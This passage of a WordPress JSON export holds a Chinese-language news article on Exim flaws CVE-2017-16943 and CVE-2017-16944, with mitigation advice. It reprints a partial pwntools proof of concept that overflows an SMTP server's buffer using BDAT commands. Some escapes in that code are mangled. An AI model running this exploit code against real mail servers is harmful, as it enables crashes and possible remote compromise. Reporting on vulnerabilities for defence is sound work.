\u8c03\u67e5\u663e\u793a\uff0c\u8be5\u6f0f\u6d1e\u7531\u4e00\u53f0\u516c\u5171bug\u8ddf\u8e2a\u5668\u68c0\u6d4b\u53d1\u73b0\u5e76\u5728\u8865\u4e01\u53d1\u5e03\u4e4b\u524d\u610f\u5916\u62ab\u9732\u3002\u4e00\u65e6\u9ed1\u5ba2\u6076\u610f\u5229\u7528\uff0c\u5176\u7cfb\u7edf\u5c06\u4f1a\u5904\u4e8e\u5d29\u6e83\u72b6\u6001\uff0c\u56e0\u4e3a\u8be5\u51fd\u6570\u6307\u9488\u7684receive_getc\u5e76\u672a\u88ab\u91cd\u7f6e\u3002\u4ee5\u4e0b\u662f\u8be5\u6f0f\u6d1e\u90e8\u5206\u6982\u5ff5\u9a8c\u8bc1\u4ee3\u7801\uff08PoC\uff09\u663e\u793a\uff1a<\/p>\n
\n# pip install pwntools
from pwn import *<\/p>\n
r = remote(\u2018localhost\u2019, 25)<\/p>\n
r.recvline()
r.sendline(\u201cEHLO test\u201d)
r.recvuntil(\u201c250 HELP\u201d)
r.sendline(\u201cMAIL FROM:<[email protected]>\u201d)
r.recvline()
r.sendline(\u201cRCPT TO:<[email protected]>\u201d)
r.recvline()
#raw_input()
r.sendline(\u2018a\u2019*0x1100+\u2019\/x7f\u2019)
#raw_input()
r.recvuntil(\u2018command\u2019)
r.sendline(\u2018BDAT 1\u2019)
r.sendline(\u2018:BDAT \/x7f\u2019)
s = \u2018a\u2019*6 + p64(0xdeadbeef)*(0x1e00\/8)
r.send(s+ \u2018:\/r\/n\u2019)
r.recvuntil(\u2018command\u2019)
#raw_input()
r.send(\u2018\/n\u2019)
r.interactive()
exit()<\/p>\n<\/blockquote>\n
\u867d\u7136\u8ddf\u8e2a\u5668\u4f1a\u8b66\u793a Exim \u8f6f\u4ef6\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f46\u6839\u636e\u7528\u6237\u4e60\u60ef\u6765\u770b\u544a\u8b66\u901a\u77e5\u6781\u6709\u53ef\u80fd\u88ab\u5ffd\u7565\u3002\u4e0d\u8fc7\uff0c\u73b0\u5f00\u53d1\u4eba\u5458\u5df2\u91c7\u53d6\u5b89\u5168\u63aa\u65bd\u9632\u6b62\u6b64\u7c7b\u4e8b\u4ef6\u6076\u610f\u53d1\u5c55\uff0c\u5e76\u63d0\u9192\u8fd0\u884c Exim 4.88 \u6216\u66f4\u9ad8\u7248\u672c\u7684\u7528\u6237\u5c06\u5176\u4e3b\u8981\u914d\u7f6e\u53c2\u6570 chunking_advertise_hosts \u8bbe\u7f6e\u4e3a\u7a7a\u503c\uff0c\u4ece\u800c\u7981\u7528 ESMTP \u6269\u5c55\u3001\u4f7f BDAT \u65e0\u6cd5\u4f7f\u7528\uff0c\u4ee5\u4fbf\u5173\u95ed\u6613\u53d7\u653b\u51fb\u7a0b\u5e8f\u3002<\/p>\n
\u53e6\u5916\uff0c\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u7684\u53e6\u4e00\u4e2a\u6f0f\u6d1e\uff08CVE-2017-16944<\/strong>\uff09\u80fd\u591f\u5141\u8bb8\u9ed1\u5ba2\u5229\u7528 BDAT \u547d\u4ee4\u4e0e\u6076\u610f\u51fd\u6570\u8fdc\u7a0b\u5f00\u5c55\u62d2\u7edd\u670d\u52a1\uff08DoS\uff09\u653b\u51fb\u3002\u8be5\u6f0f\u6d1e\u5f71\u54cd\u4e86 Exim 4.88 \u548c 4.89 \u4e2d\u7684 SMTP \u540e\u53f0\u8fdb\u7a0b\u3002\u5bf9\u6b64\uff0c\u7814\u7a76\u4eba\u5458\u5efa\u8bae\u7cfb\u7edf\u7ba1\u7406\u4eba\u5458\u5c3d\u5feb\u66f4\u65b0\u81f3 Exim 4.90 \u7248\u672c<\/strong>\uff0c\u4ee5\u9632\u53ef\u80fd\u7684\u9ed1\u5ba2\u6076\u610f\u653b\u51fb\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"\u53f0\u6e7e\u5b89\u5168\u516c\u53f8 DEVCORE \u7684\u7814\u7a76\u4eba\u5458 Meh \u4e8e\u8fd1\u671f\u53d1\u73b0\u4e92\u8054\u7f51\u90ae\u4ef6\u4f20\u8f93\u4ee3\u7406\uff08MTA\uff09\u8f6f\u4ef6 Exim \u5b58\u5728\u4e00\u5904\u5173\u952e\u6f0f\u6d1e\uff08CVE-2017-16943\uff09\uff0c\u5141\u8bb8\u9ed1\u5ba2\u5411 SMTP \u670d\u52a1\u2026<\/p>\n","protected":false},"author":2,"featured_media":1128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[147],"tags":[115,57],"special":[],"class_list":["post-1127","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-market","tag-cgo","tag-57","entry"],"views":83357,"_links":{"self":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/posts\/1127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/comments?post=1127"}],"version-history":[{"count":0,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/posts\/1127\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/media\/1128"}],"wp:attachment":[{"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/media?parent=1127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/categories?post=1127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/tags?post=1127"},{"taxonomy":"special","embeddable":true,"href":"https:\/\/www.growthhk.cn\/wp-json\/wp\/v2\/special?post=1127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}